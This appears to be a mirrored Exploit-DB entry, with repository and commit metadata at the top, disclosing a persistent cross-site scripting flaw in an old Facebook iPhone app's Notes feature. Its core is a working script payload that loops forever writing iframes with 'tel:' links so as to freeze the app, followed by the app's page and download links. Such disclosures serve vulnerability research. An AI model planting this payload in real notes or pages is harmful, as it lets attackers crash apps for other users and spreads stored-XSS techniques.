exploit-db-mirror/exploits/hardware/dos/10947.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

11 lines
No EOL
474 B
Text

Facebook for iPhone persistent XSS
Facebook application for iPhone is not encoding special characters in Notes detail
Adding this code in a note will freeze application:
<script>var x = 'x'; while (1) { document.write('<iframe src="tel:'+x+'"></iframe>'); x = x + 'x'; }</script>
App page: http://www.facebook.com/apps/application.php?id=6628568379
Download: http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=284882215&mt=8
marco_ <marcojetson@gmail.com>